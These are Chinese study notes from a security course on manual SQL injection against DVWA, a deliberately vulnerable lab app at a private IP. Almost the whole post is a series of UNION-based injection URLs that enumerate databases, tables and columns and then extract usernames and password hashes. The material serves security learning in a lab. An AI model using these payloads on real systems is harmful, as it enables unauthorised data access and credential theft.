手动漏洞挖掘-SQL注入(安全牛笔记)
1 2 | substring_index(USER(), "@" ,l)-- #是将查询出来的结果进行切分,以@符号的方式切分 ’ union select table_name,table_schema from information_schema.tables-- + #查询数据库中所有的库表 |
1 2 3 4 | 查询所有数据库,数据表: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+table_name,table_schema+from+information_schema.tables--+' &Submit=Submit # |
1 2 3 4 | 统计每个数据库中表的数量: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+table_schema,count(*)+from+information_schema.tables group by table_schema--+' &Submit=Submit # |
1 2 3 4 | 查询每个库中对应的表: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+table_name,table_schema from+information_schema.tables where table_schema=' dvwa '--+' &Submit=Submit # |
1 2 3 4 | 查询user表中所有的列: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+table_name,column_name from+information_schema.columns where table_schema=' dvwa ' and table_name=' users '--+' &Submit=Submit # |
1 2 3 4 | 查询user表中的用户和密码: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+user_id,password from dvwa.users --+' &Submit=Submit # |
【推荐】2025 HarmonyOS 鸿蒙创新赛正式启动,百万大奖等你挑战
【推荐】博客园的心动:当一群程序员决定开源共建一个真诚相亲平台
【推荐】开源 Linux 服务器运维管理面板 1Panel V2 版本正式发布
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 糊涂啊!这个需求居然没想到用时间轮来解决。
· 浅谈为什么我讨厌分布式事务
· 在 .NET 中使用内存映射文件构建高性能的进程间通信队列
· 一个 java 空指针异常的解决过程
· 揭开 SQL Server 和 PostgreSQL 填充因子的神秘面纱
· 15天流量破10万,免费拼图工具的毕业典礼是被抄袭
· 从硬盘爆满到 GitHub 封号,一位前端开发者的开源历险记
· .NET 使用 DocNET 库快速高效的操作 PDF 文档
· 微软又一自动化开源王炸,Selenium 慌了!
· 分享一个 ProHub 风格 logo 生成器